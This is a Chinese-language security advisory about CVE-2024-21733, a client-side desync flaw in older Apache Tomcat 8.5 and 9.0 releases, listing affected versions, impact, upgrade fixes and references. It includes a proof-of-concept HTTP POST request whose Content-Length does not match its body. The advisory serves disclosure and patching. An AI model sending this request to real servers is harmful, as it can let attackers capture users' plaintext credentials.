描述
Apache Tomcat® 軟件是 Jakarta Servlet、Jakarta Server Pages、Jakarta Expression Language、Jakarta WebSocket、Jakarta Annotations 及 JakartaAuthentication 規格的開放源碼實作。
从 8.5.7 到 8.5.63,从 9.0.0-M11 到 9.0.43 的 Apache Tomcat 容易受到客户端去同步(CSD)攻击。
影响
当网络服务器无法准确处理 POST 请求的内容长度时,就会出现与客户端去同步(CSD)相关的漏洞。利用这个问题,攻击者可以操纵受害者的浏览器,导致与网站的断开错位。这种操纵可导致未经授权从服务器和客户端连接中提取敏感数据。
影响的严重程度因使用 Tomcat 作为后端网络服务器的应用程序而异,可能会暴露明文凭据等机密信息。例如,我们的团队在 ManageEngine 的 ADSelfService Plus 门户 6304 版之前的版本中发现了一个实例,在该实例中,可以从客户端连接中偷偷获取明文 Active Directory 凭据,如下所示。
PoC / 漏洞利用
POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: “Chromium”;v=”119″, “Not?A_Brand”;v=”24″
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: “Linux”
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
X
解决方案
受影响版本的用户应采取以下缓解措施之一:
升级到 Apache Tomcat 9.0.44 或更高版本
升级到 Apache Tomcat 8.5.64 或更高版本
来源:Sn1perSecurity LLC 的 xer0dayz 负责任地向 Tomcat 安全团队报告了此漏洞。
历史:2024-01-19 原始通报
完整安全公告:https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
参考资料
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
原创文章,作者:首席安全官,如若转载,请注明出处:https://cncso.com/tw/cve-2024-21733-apache-tomcat-http-request-smuggling-html
